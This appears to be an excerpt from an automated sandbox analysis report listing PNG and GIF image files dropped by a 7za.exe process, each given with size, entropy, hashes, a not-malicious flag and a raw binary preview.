      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y.M.A.>..`...P.X.....Q.P.G.t.V.V... .x..|.g.1.{x..L8owngv~vvL..B.P(...B......yz....e.|{._...r...c..9!eh.......s.V....1^rN0\...f|\I<..{..P............E...Y.......!R!....W..B.L.6$.0v+...s......y.D...E...B..@.A...<.....`...Pf..r.....X.r&....Vh.5..Zp.I....Y..i.}...m...q..kFK2...O...6......O .f1-..YS.:..T..rG.s.S6g.4.|.h....We9.rw...[.%............>).(,.K.BF.z>...L.%.X........8....k.?.........j.q.t.F|..$...V..e..?u.79.t_..4.....i^w..(.P..a..1.;....c)xd...8....Z..X...,......Ef........,....X.f..y..3.Cc.....F.3C.W\xK&.....q....X..0.p.[.s[.E..rS.Z...7nYx.dh...h....g.)....1.^.....tZ%..8/]m..#..2..E.G1.p.8g.......`...(...B.P(..f..`.!.1....P....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):645
      Entropy (8bit):7.518295959397572
      Encrypted:false
      SSDEEP:
      MD5:8E26E780B9DC86118C47BB5F422EA5FB
      SHA1:CF08002C81661A5C214F4B98822EB11BE785199F
      SHA-256:A5641AA103F62992611247CAEAC22E4898766068687D68A1E5888AE5D43D2C6D
      SHA-512:C00A7AFA002D4097F709E235D7F65B678C08EAB51ACBBD5E269E5EB820A2B718679BBC6B6D4AB080ECBDA33E92BEAA43D126E6F73A8E2252C0209F6B9050A044
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...8...8.......;.....tEXtSoftware.Adobe ImageReadyq.e<...'IDATx..X.M.0.%. lP>...4l.L@....2A..........o~....;.L....V.'..&W....w..@ .....@ ......\.nB........... ...eAv.r5....eN......Dv{...VN.@!.......Vd.....{....I]...T}....A.P.MA..9^...@q_5....j.#..}. .....5.j.`....-..1Nz.K@...[..P...|.6..{%|....1yl..s......j..'..i......"..w.A.b......Kz.i.e..d.I..8...%.,..Qd......w..<..N$'.i.w....4....%l.{.j.!..<'/@.''..e.R..u0....ef..fb..1.z...3...~. .TA.G..<......UZ9.{HI.[..T.. 6v..u(=..G5bt:_.).i$.M.m..r..c.p.d0Af.0..BJ.:..,......5.\.z...$h.Tc.%.Q...Y...(.m..4.?..ye1..N...P .....@ ..........o=...S....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 40 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):580
      Entropy (8bit):7.402531374705451
      Encrypted:false
      SSDEEP:
      MD5:6100298212ECB907D73FD82F59C9CAE0
      SHA1:2DF688C5A9EE209DF79AACABBF7A81105DB69C8D
      SHA-256:7E1721A06852740B129FE3856F9A8A712F2EC655346ACD1C11052A0A070D2458
      SHA-512:EA4DACD9FEA56D6DF2142EC9E14B10359BF70D5D6532DBC2B9654FE362EA4BB0905776426101EE8AFF0F4033F560864238039A332EA23F9AF102D7CA545E4DAC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...(.................sRGB.........IDATH.c`.....#%.=..(0...g`...4..........a...s..49..d;.swn?.a....8a...B...".....~....h.z..........q..L)."$9....\@.#.`:.....[.TGj.!.m.5.Y./....d.?..F...?,..f..C..[.t.P.7.'C.v......&R."....2\. .H.3..bQ.....c...@..^.Z0......?.../....tL...Y.'.."."e.. ....yk-..OP.I.P.@.c:...i.d1.EZ1`7,...a.....C=...............$..{..0.S.)!x.];(...-.......(.ys-.Rt>.Y..`|...x....Fv$(S.......j0....T..@t..Z%.,.....Kk.>?%.q...h.6s...]..4...f.H.....Q.................,R.H.A....hHn..#. M @Zt..... $...i.G....lrB..{3..bN.,....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 40 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):461
      Entropy (8bit):7.381448948022069
      Encrypted:false
      SSDEEP:
      MD5:7E7B00D5AD118920F9F688090B346E27
      SHA1:D1057DE1D40ED87C5EC61FB5EDB22424FEDC936B
      SHA-256:EADC3DC252E1942F7CB397C5282EA358FB7C6D111F4F71ADC1E72198172F3BC0
      SHA-512:242B82FB6467B7AE6032DA15B956082A763684848ABCA7121A09B877D10ECDBBD0C25BB33209269BFE3C04D2C450F51FE15DA2F92896E13E2AE689A9246B91AC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...(.................sRGB.........IDATH..VKn.0.uB`.#..b... e.T...A{..........,)...X..;...r..'t.H....0..0.}]...8d.w\t..2pKh.}..C.w..E.d..h.vUh..,.....We.-.tp......r..c..z.%cM.t0.b.&.a...o].............~@.#>.i|...).... .F...#)X..^..o0.\O.m.KJ.W...3.....G.;...:.zA..{...C.Q.......y..K.`.=j....p...tw.0.w.b4......+..vj5C"..W.2....V..pF5...c.h-.iQ...|.....?..].a.0.. .A..!...=Q.....cQ.ICR.FQ.O.5....4..'m^.9\gw........v........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 240 x 3
      Category:dropped
      Size (bytes):2664
      Entropy (8bit):7.365343388376489
      Encrypted:false
      SSDEEP:
      MD5:C91945382EDB436989E6F437A824A163
      SHA1:D5CA29865036FA9D7D9F71819C2AEF91A8D6E259
      SHA-256:104E65E50FD82C7DBEF98B3C9967C325C9B42FDE896DA5FB110798EA72730AED
      SHA-512:1F2BC8D72A683554E2CF4F250B63F35EF93967849AF3E99657AE84219E10D4CC984ADA0E4BA4464B7B3AD7A8A7AFBFBAE84A1EF45A6BE4F2F652406A5A4E78D5
      Malicious:false
      Reputation:low
      Preview:GIF89a.......\....t..l..d........|..l..d...............!..NETSCAPE2.0.....!..Cropped with ezgif.com.!.......,..........".....8...`(.di.h.(i.p,...Pu..|.G.!.......,..........B.rj.......fe...h..l.p,.tm...T<.v.Qe...L..r.l:.8Q.W.TB.....z...2..!.......,..........e.rj.......w [7...m..".V...@..|....pH,...dnQi.D.f4..`..*.z.b.Y.NI....t2:u.....n{..6)....3}pbj.....9..!.......,..........~.rj.......w [7...m..".V.W..].b.j..,.(...r.l:..tZ\T.....\2......e0..>..W..@...........!...!...q...|...7........-.tz....N..!.......,..........n.rj.6......ycX.&G.e.lL..|....v...N@.(...r.l:..."..Z.#+0.d......k..:.......A.........~........~;.Bu{...v..!.......,............rj.......w [7...m..".V.W..].b.j.W.f.d.]......$n.bY...v..z..x.]T.....d(.8..v.....>...v..~w.}{.....gh!.Xd....kmh7.......!..l...k...................g......V#........!.......,............rj.......w [7...m..".V.W..].b.j.W.f.d.]......$n.j..'.......xL....Ee..`..L.....ry.o...w.~|.z...{...............p..ah..doql7.!.....!..p...o.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 40 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):415
      Entropy (8bit):7.249980241720994
      Encrypted:false
      SSDEEP:
      MD5:D62BF80A20A92525376D1A1F9991054B
      SHA1:FF722D4E9BC1A84830578811434C1E274DAD5B8A
      SHA-256:84199E28D602E682A62DC684EC88DF7130BA439F1155846C2DC153B720FD19F9
      SHA-512:73BDE35215FF0B16E7F390F42CFBBD56CE2E4E5E283F44B52C7DC4332F8E4F7B4599CED519DB93EA77AE094DAB0BCA0C7C8C78E4C95534067D4D07D7DF2A7F54
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...(.................sRGB........YIDATH..T.m.0....0J.A.z.f.f.$.$.t...wF..a.2.?...I..Jm..J>..~...w>..'.....f...?...y;U.8..j............v....OM..y.m.@Q...0...x.E.y..5+.4M.....N..^.D...(.V..G.....IR.;...0U..[.}..p....l.6B..t]..`.5./.r..'.4..g..k....=.......P.6.~A.......FC2..."I.7..h.my.....mm.)....CP....M&..PX.m......@.-.}...&....Y...X.axa....Aa.G.V....c...V.c`~.n..a._iR.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 211 x 48, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):3509
      Entropy (8bit):7.914912696064647
      Encrypted:false
      SSDEEP:
      MD5:A01A98CC0D06CA29514FADDDC938331A
      SHA1:6C86F06ECF92A56C5226722AC7172C58B9782607
      SHA-256:DF0554489D4FA894418A9569A1D0749A56CBA8B17DAD56D764AB5A14E3916343
      SHA-512:6EF9AAA99E321CB97820AC08F00F20E635D66A1577795646B46D212C24BBCD2EB2FD6A47A9BFFB3142C8F9A2ACC7D22D175820C504172DAD29A2E24C250A0A1B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......0.......O.....sRGB........oIDATx....UU...?.)..SD.|..h..aARYS..0....f...)..9Y3E...S!.....~.$....f...........W.Tx}..s/.u..s.=..s.;k....k...?..u.{......".@sssg..........T6...L.K.6p..........Pfl.Z.A.=..S.<.......'|......e..l.0x.....55.u....L.W..7...s.R...G.........]...nl..J.f[.......l...-......"..........u..M..HP_d..._......KAv.~.f.uL9F.....M`..-.........._.vq9.o........9q)u..i...=.<p..K.!Y=.i.r....%.v|H.=.u..2.T..W.g._..B.#...|`......Y.....$S...*..j...7.....E...k%*/=.M... ...O.n.,=p.m../@.R0$L0..`%..r.$..3To...%b..:.c...I..)h....%i.>...1..$.P'.W.....;...Q.h.....3....O.R.?.......` 8.CJ...yUFe}$].O...1l.......@..6I..+.jN!m..%...V.Z..L.(....o.\-2.A..t1B.........F..L....g..L..m..OkI.J~...N.....{I...C...#U7.....O.`.).._...#@.;..]I._G..$.7..E..J..3N...8.Fkk...#.yF..9G@.A.K.m..s......F.Z...~.. G.....j.. s.....g...4\X....P.].EO.+..B.....I/..~....y.X].,.Z%\...^.#...Y..I.K...j..A.jF..$;_.5y..^...=..z.L.j.r..p.<.t..l.s.z.O..r.%U..gB...l.`
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 200 x 200
      Category:dropped
      Size (bytes):63483
      Entropy (8bit):7.800186164433534
      Encrypted:false
      SSDEEP:
      MD5:C6A5F2CA920E033D92937A4F1093A533
      SHA1:216A94187BA039FC1BF60B627770B205B6921EFC
      SHA-256:0C81A94824F2A8C42E76C2A389EB85FF5C6D8152CE511B5B1F9F839D2AC47029
      SHA-512:593C633BFE5EEBF198CEB87CEB5D481E8524293DD1666C67B1629619CB635A5150ADECCE200D312B43B8E41286FFE437442AC0C7F8E9FF19278C169E1F82D813
      Malicious:false
      Reputation:low
      Preview:GIF89a...................................................................................................................................................................!!!###$$$%%%&&&'''(((***+++,,,---...///000222222333333333333333444555666777888999:::<<<>>>???@@@AAACCCDDDEEEFFFGGGGGGHHHIIIJJJKKKKKKKKKLLLLLLLLLLLLLLLLLLMMMOOOQQQTTTUUUWWWXXXZZZ[[[]]]^^^___```bbbcccdddeeeeeeeeeffffffffffffffffffggghhhiiijjjlllnnnppprrrtttwwwzzz{{{}}}~~~~~~~~~~~~.............................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^.x#..*Tt@.&..+..Y.L.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 400 x 400
      Category:dropped
      Size (bytes):19110
      Entropy (8bit):7.919494880262766
      Encrypted:false
      SSDEEP:
      MD5:A90E737D05EBFA82BF96168DEF807C36
      SHA1:DDC76A0C64EBEFE5B9A12546C59A37C03D5D1F5B
      SHA-256:24ED9DB3EB0D97ECF1F0832CBD30BD37744E0D2B520CCDAD5AF60F7A08A45B90
      SHA-512:BF1944B5DAF9747D98F489EB3EDBAE84E7BC29FF50436D6B068B85091C95D17FE15B721DF0BFF08DF03232B90B1776A82539D7917599B0A3B2F2F299E7525A51
      Malicious:false
      Reputation:low
      Preview:GIF89a.....w............................................................................................................................xxx......fff..............ZZZ...............$$$iii333...000<<<......KKK..................***............666...HHH...rrr...........{{{QQQccc...???~~~---!!!...999...NNN......'''........BBB```uuu......TTT......ooo]]]lllWWWEEE....................................!..NETSCAPE2.0.....!.....w.,............w..................................................................J2:IuI:2J.......PAu...AP......M....EM.....b...Z........ub....$....u..*\...9..\.`H...;) .Lq..G|!.i..$..(.}.i.E.0..`.OF.8o....H.@]..9.H.HK...SNK.=.JuRTy..j..*:o\..z...T.j3..mR..........t...A..v...K.d....;........d.v.[.7,.,{C..bh*L..M....$....-..-.........I.0.-..hQ.h.......r+...Go........k..4X...g... J#.v[..w? ,<0*..ip~.....X......K\uF}....~.].K`....Y.......7.v5...]....Paw...!\..BA.pE.b*.....'.......... c~......8d..<.r........<h..I.b...9....p...U.2.....]D..b`>.Y.d.w...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 256 x 81, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10358
      Entropy (8bit):7.939759467125569
      Encrypted:false
      SSDEEP:
      MD5:3F95B013398513C00ECAE1E5B5F43836
      SHA1:0D3BE84C04C000858DFC376717A11BAAE16836F9
      SHA-256:42F1B3323D0BBE89E67A0F40F629CC848A257FFE33D6B1846357D5178935F8F4
      SHA-512:A5132A6235F5EF128986876DD02FF652AB2C677769E4EC1C813A02B91781CAE6069C7397A3B7FA3A015F2F5B0F6D71A1F6B9014799C865D46418A3B0E7E44485
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......Q.....=.x.....sRGB.........gAMA......a.....pHYs.................tEXtSoftware.paint.net 4.0.5e.2e..'.IDATx^..x....'...".[.(b6!7..j]Q.w.B...mm.>...*.+a..V.....u..Dm..`.B.......B%......7..{n.{I0...=3..9g...=.s.........)F...C..htpph.............}`4:88...F..........>0..&./99..~..NL.&?)%??).3...$..d.....)/q|...s.$...q..;..sphO..{.......o...q._...[q._..u.....JN9...C{.hl.X7>......9..u.S.d...z....o....8.a/..&....a..>.6....'.:0?5.[.u..~...m.k...X.'\ee.,.58.r...\~b.U..S...$%.3'1...>dvr...............7g%.d....%<...?F...B...YY............a...g'.;.....}.B.OC.....p...KN...7..'..|.eeeF<...5.k.^.7.i...~Kaaa....Cy4.kK....52GU..!..!D.u....y....FL8...sJj.......6...R6.<f..pVbbwS..b...}^...>.....y..{-...L8j...v..9,\..+..J:.....6..KJ~B>......z<....!....;....n...|\.}=....`4....!...)"..!.H6Q;.ee=y.)=13)....ki..n.ztp..`.N$.......A.........&8W..._X..x......k.J..H....;.n...Ks@.W.................^..Z..|.|..zS......X......d..?.v.....@n.>..xX~R.:....'..>
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 263 x 74, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):9391
      Entropy (8bit):7.9496261132118935
      Encrypted:false
      SSDEEP:
      MD5:CBF0FCA85E280DEFC857517DB64F7EDC
      SHA1:2B342E375C372FB6D37776578886999962C2E9E9
      SHA-256:CD6674A8B2EB3DA1358D335004875B276350AA0086C98AE700658C3C7C736619
      SHA-512:955051BC7EC0198A82E2163FA0EE1E2C1571313B902D46CB31E4FEA35DF82A6676413A4BCBB7A7613C766C1AA642F79CAA46B38A2A562880B961648B5EF9195D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......J.............sRGB.......$iIDATx..]...E.....$q..(..(..H.#...O..... A..\=AD.z`8A0...E.D.$( .. QX@....3.....f.g.'...~.o........M.!e..WNmp..i=.a...Q..da.y.&~...mh....o.3..#...].....T.hE..)..Z.Z.<T...:....Y...\G.#.....q.x..{ ..(..09..%.Z.R.ie...Ym.0.Bh_....?.;...:p65..{ ....@.C.aeDe.N..z..c.X4y.YYmz....!~q:.......+...%.W....m.2.....)...w}.!Dn.y./..@...z ....REb..Q. ...fiX.......V.Ns-!q...C.jbF..4.Y..TT.\..@2....3.g.3.g..z+.....=.9..uHMQ*i.0D?..I.E.b.._N<g....~V.q.kW-/J.A..,.#.7...m.t....k.N..J`.p..l.k>.w.1|..w..So.....(T.\...u.._L..@W...p..Z<.@.o2.&N.....9i..g.*.n...5...u.zd.....N.....`3.'.M..S...._R(..i........3...q.cw....u....7+...'L>`..q.6.*...@)..,.M.8,..:...Unb......O.4l6. x...1p..K....e.n...S...f...l."J#...3GN..".{.f...o.Y.....^.m..I...C...w..1r,.."."H..vk..}!.......d...y.......:..6.t}1..3.W/.zN1s%'<W._..............H.5Jf...gK...V.&...p.U. .6.&@..DQ..G...G.,l#.CO.....++t.#.c.-gE...]..B{.:5.)....U..o..R.u.W.*... s
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 166 x 47, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5619
      Entropy (8bit):7.956248700696265
      Encrypted:false
      SSDEEP:
      MD5:8A63F363D7D976DBB4D2EF6A08C9247B
      SHA1:5F035013E4000BCC95094F22D40D6A12C47857A8
      SHA-256:7930BDA2199A80DD8635EFC0EAC27D3C48E3B353517C1C1AE8F6403F2AA2E7C8
      SHA-512:D75DB221DE480D02B47BF3B13A03A5BE3B0E114458BF848C1229A6E4BCE31D82E0A9C7D1A50462759DCB0C44F31B147B57BD2AB560DA64AE25BD2BA7A1FD0193
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR......./.....i7.g....IDATx...xTE...v......(.D.qGT..T\`.....S...#.1......<pAy:*.T\...("...(..........so.v............S...=u.n..e.&7h.".Z...2.m..c...f...Y....;...#..e.l.._..XeuM.Z..X.6.mcj.c.,...6....!{..~..cv..+.^%..{.J...5U.....Yf...S[..b...a[./{.n..5k..D..*..QG.'=B...Q.....=.`UR....&5..Y.......'".&._...w.m..kOK{Z...,...G...7,......Q.._.......|.:1.E%..o.i...3n<.....m...g..:..g.S.~.O....Xy.6..-3xd..oc.....)....&....:...e0..&E....@..W'U.....}...4........L.....h.l...>...c5.z1T2G.l..Yf|..N......wL.[.z-e.\..[.-.../?V...(..+.6k;...&N,c..G.?....R '...hvob`....'C.P..d...'.8....F..VB....k....).c.....|.p...e.k..Y.............g&Oo....uZ.a..d&...A_..&.....-C.p...4Y.c?......KI.....G....w..$.cf...n.m-iI....|......"<.or7\.R.%1Q.L?..'S..n.h.T.q.....>.(..'..$D.....r..P.J..e....U......dt..3..L.....0.....&.ht..Q..8p.O...$F....>....f.UH..7.;.k.&R........\....`>.&..~@...../......,G~.W..T0.......a......5.......^[1.;._.r....s..`,.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 342 x 42, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):7422
      Entropy (8bit):7.9653410646241625
      Encrypted:false
      SSDEEP:
      MD5:0E5049C588BBEFE19A5D6BCFCF20C10A
      SHA1:7C7F7FC8AF7794C72DAA971B3049F1FEAFE3EA1C
      SHA-256:002B2C4A348040E3E5EED6FB9D5093566D30CEF11133714C7F497E64E96C0EC3
      SHA-512:F6ED35782ECE1DE1FB3976C8E2157A9627043B2AE09A1563B78AFD31676FA8E346415938715631C912886DD3830CB323AB71A735C13BAFB6B8E620409239AAAB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...V...*......8s.....sRGB.........IDATx...{VE......./A.......a...~....gz......zx..QA6..ED.qCHB..5.......^.*....7.oH...yS.9.N..:u.T...,?........d....Y.f]X.hQw.......%.K`XI . ..8p.......e.:.......{....y.e.y....).///...'...c....%0.%...R5h.}e(..{{{....;.a.o..x.=..]..-t..8....qc....c....%0.%..b}..A...._F..B..qZ..._.f.MW..|..4.6.7.......n@...[..eq:.@,.X.#Q.A%...;vT.8....NL*Ld.@{(?.n...L.w.e...`...../.~....t,.X...F..R*V..YX..iTQ:....M.6}..~......Aq...aq\.'P.'...X...b.....D1..U%.Tm..R...b\.{..E...W.&._V....G1/.?.Z.lXy..K .@,.. .P.g..(........%..'.r.....5.."..W_}55Ey\.K .@,.a-.$..K.....l.K..y.~..9.jvi`.A..p....c...U.~.;F..}.\....}...'.......h.m....eK.....E.0..m)..(.F..n..&=RCD....t.G.w$.m.."..2..#G.L.y.f.a......^.j.....U..W...=.Y..vGs.....\.Q......;...z._.b.. ...vuu.........v.A.).H..c..N'.F...B...~......n.:TQQq..](....jM..+..-NQ8s..1L.U)@l.r.....u......{'.x.6.0..ry.../..D.e.+V..OK....3...{. ..,...)..s.0.._0...B|.Ig;.!0i...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 81 x 74, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1892
      Entropy (8bit):7.798621332480424
      Encrypted:false
      SSDEEP:
      MD5:DEDB8AA6ED534C751608031D3E9A6396
      SHA1:F82BAB5656F01BF600CB051C84BAF979648E0082
      SHA-256:C580A3F9E5B726E3465B14DAA5821ABF2C73521C686D9942B5C40FE23D5B43C8
      SHA-512:5679B9E8DB4D506D92C70622AAD6B3D01CE37057C40B2513EE6C5FFAAF8857FAD068D28728794E7FDBA1E2382A6CD9FE3EA899FDFD5844B0CCF81235A16723AC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Q...J.......n....sRGB........8eXIfMM.*.......i...........................Q...........J......*.....IDATx...l.E....W*...$.BL.G.....T04A..5..h5".L..Ji....b.U.H.....AM.!".#.@.......&.Q..^.......-..^b.....n'M....y.{3.vgn..H.dU..k..U{.N.F.z..1.q$...F.^.S;...L|.4T0].5..h.v.,..NC..st.+z!n.X..{L.v*..R+....#D<N..D....G..O..".~XU.D.(..R7.Z.....,....=L%..}....j...T.z.0.,..yb(d.(....D.W....A.r..%X.bVV.j.H..J... .Ad.S....:.. H-.KU[.z.R...l..)..xb..|W&.UU...."f...0A.7..Ej.HLv|(..%P.Y.D....f..${...DA..x......#.......".tg.~..[!G...."..(^...".@.......BT0..yO..9..8x...l.....z04=...?;.XLt.(z .P.. ..0 .....~Q..,q....b..V.....+"..o.T...;K..\~..Xx...m.|..^V.D<x8.`...4..Aj...T.p.s.. .A.Y!..q..(.../a?b..cT...U......5i.Di".Eg.A}......"Y...1.N.~.Z!b.......<-..y...J..B..o....8.X..>V.B.....i.%6E..O...S.";0..+~......[.Sv.Y.!...YL.]....i..'.CE?D@2.=....~P.@........c.+....l....n....j..U.^..@.....8...M.wt7x.`7...D3Qo...e..L........ JF.L...._.UE.[}..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 48 x 35, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1070
      Entropy (8bit):7.613605151620366
      Encrypted:false
      SSDEEP:
      MD5:A2B5D78A49F66313A203F666FAA64393
      SHA1:99C22FD6116D69CD2D21ABA072F050B5D8F51006
      SHA-256:FD42158B4E01B5C86360C9450E9E3DB5E399E0EADB28E5420AC69F7DA1DC0FC5
      SHA-512:03A7ABCE1B4C2BF82F40BA9AF1F25022BC20AADDD745B08FADA7AC01DFFAAB05697880F080D38B4672905AAD2D0BED319A83E13C3D247B3900673E76FAB8CADC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...0...#......@......sRGB........8eXIfMM.*.......i...........................0...........#......d....IDATX..X.n.G...o..].cg.....aY(.<@^.^.....)...0.(."'...~..r..D...&.[c...tw.g... ..#...............z.....T.A .,...#((a@...*.F..)..0...[h?k!.....3...W..K`..`....$m.....*...D... .....O.......H.Y.U...i'..JR.$L...%...t0.Qh6.~...q[.-B.h0..q4C.Y.!..(R...d..au.p...wo....T.^...V..zx...=..'.&../...&.2KK.../...(.:2?....2....`A...A.....~..x..1..W.....(..6VW.|....oGl....H..3..cd3..?~.=......wC.....T.......H(.D.....[............@xq>?.RB...._.m..M..!.....Y..$l....~.t8...S.R&...~.N.._.H.W...s"..n.m0..,.*..\......r..Z..e......P]...H...(.tq..< in.D..E.e..=`c.^t.j....l....{`..G.Rc...(.l.....39.....s.....0O.]r]B...N.+.@..:!R.f?ae|?]....@..O.[...Z..l9..0.kt}...j...m_0..C.l.oV:o._...[L..u...mz.....(.<:.....l.=dYn......&T....~sN[7..[H$...ZV.c..I$.O..t..+3.zNp.......Kd<....@dK...]......M..H\l|f....7W|Mx...%..5..W;=%$.../f..*.......fb..U...D...H....2.>~{
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 81 x 77, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1870
      Entropy (8bit):7.784796950792308
      Encrypted:false
      SSDEEP:
      MD5:82A56BE8CAD7D42256BCB114076F0049
      SHA1:1CBF4EDD6A55F0938F2C7A3E5BBDD60E8A079D5D
      SHA-256:8D68F01C05C9CD725403D73BD4D43D0CC21B7E0F5EF2525BF90D33703D7E2440
      SHA-512:E3D001BB1E7945ECB25BC8531C5591994BAA2A6CBF20D3F2BF36AE1DD3409BD07CE3499BC79BAD0AAD9CFFB5B6DC80FF9AD3CD300852D2F64941A30DB726A683
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...Q...M............sRGB........8eXIfMM.*.......i...........................Q...........M............IDATx..[l.U..s.R...1.@.^y@B|P .>`D.%.FILD..`.....Ui..m..#j..F.L.......h.(rK.`.........g...B .r....I.........s....8.um.K}}.N.(...d.......52D....k!.Awkx.wE..>.$H.B..... ..u-.E.(". ..8...N'..<]..|G.I.g..r.Z.8..JX..i.d...W.I.Z%jH...OQ....B..5u+.o:.."56.C..14a.GziwC..d.JC......lo.I.:XPcm8Pw/+.u=.......r!...' *E...Rj....' .....]\HJ..6a=..\l.~(.*.......<....1H..;.A.%n.}..7 .."aWi..[......D.%..PU%........DA...1.+.........}..3.9+.....L..&.g ..gl..D...3{.y>..y..&.g.H..9....p..79...........i#._4..&.@.@....- &l'..>.3..._mGM"...=1.3....1*A*.....Y.l..W.8..H..C..'.&.g.(........o.z.":.;..%.a.MX.@.&..............U..c.6...k..T}<nSN...9>.sGs.'.3..}...}_.o.z."f..20K.o.7e..q.6.`.KG..UU.X..>z..T..y.........z%".....T>f.u5..o^.u8.k`....z.$<......[.9.....7...MZWC...lX..}.k!..o|..f.x.O.7....g.N.._*..A............^......d&...x.'.P.K..H60.[.i:2%TC....'.t..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 9, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):405
      Entropy (8bit):6.784565283560614
      Encrypted:false
      SSDEEP:
      MD5:78A0B55C7DB99A6605A53B734E6F5784
      SHA1:7B6A6F0BD734936D1AEAF66637E6699A2FDC3659
      SHA-256:29A01974B5F933A89F6730FD7F0F4E60002678EA805CB1C9BBA67EF38D3E660A
      SHA-512:AB0172AC4339EEE6C9CAD39F952F1EA0C4E35A9ABBEB90CDDE007FE5C1BB69F7B6230A7317580D659D65B345F65187CB7FFF4957627530D4066C8A642CE07404
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............vW....sRGB........8eXIfMM.*.......i....................................................IDAT(..Q.N.A.....k,.i.01R`.....U$....o`.......rj.Dk.i(h......01.4.f.....`h...m../lr.....)c...-.@1.{Je....m`.*.T...J...{w..6..).E~j....:.).#.....C..By.u...Xx.3.0..5.}]....!E....M.1{..........,.<......r.....,.&.%g.sj.|(];...BV...}.......9$.Nd.....(-.`........UB..Q"....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 21 x 33, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):490
      Entropy (8bit):7.073940174344756
      Encrypted:false
      SSDEEP:
      MD5:AB345903494A8AA27C9E8EBB31A72477
      SHA1:B8358D7B2D8EBB0AD6526702DB99AA09BCCF9926
      SHA-256:623D609B9808ACE726AEB81F1DB802A51FF96AE638F20FED7CAFF7D54D512148
      SHA-512:43E0052D4B3B3D63067A344DFB2B7139F22680695F473FE7273BEAB2A4C17FAAD3CC2330B037252D6CF1B1F7B94A969CEFB7942A17624402A578160C70B1783F
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......!.....6..-....sRGB........8eXIfMM.*.......i.......................................!.....r.r...`IDATH....m.0..O..(.B...B!...B .... 4cP..C.1...R.9n..I..v....N...C.j..Y...-.u...o.K7).l.(..._DX.O|..T..0.k/T.(...g....P.'e].;....C."..n.GE...w....E.V...._.~G,].h.Ui.r!.3. .ut......%+b........Zy..j.rA.%....%.w....h..VyQ....H0y~..;m...V......J1.0wGh.)A...<L.......9X...v9.x...`.....7en.b...I.<..x.{)...B~....i)..>|d.d~.....Q..........b.........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 15 x 13, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):356
      Entropy (8bit):6.964209925460585
      Encrypted:false
      SSDEEP:
      MD5:74CB146DD27B7A10BBDA4E425EC795D4
      SHA1:C59AA3690739D1D3355613B2E9418E87DE374C0E
      SHA-256:1E9FC97904139AD22D8DAE8CCA765057979B9F4E205D8CC1648A768C3F762FA4
      SHA-512:63BAC8EEDF3B03BA6F5CD19A00CEEA8D0D92209B92AE4A9C678823C0D0860F92B9EA93BECDF54DD3D71F90DBAABEFA01FB91C74D0881F5EECF2254E85CF7434D
      Malicious:false
      Reputation:low
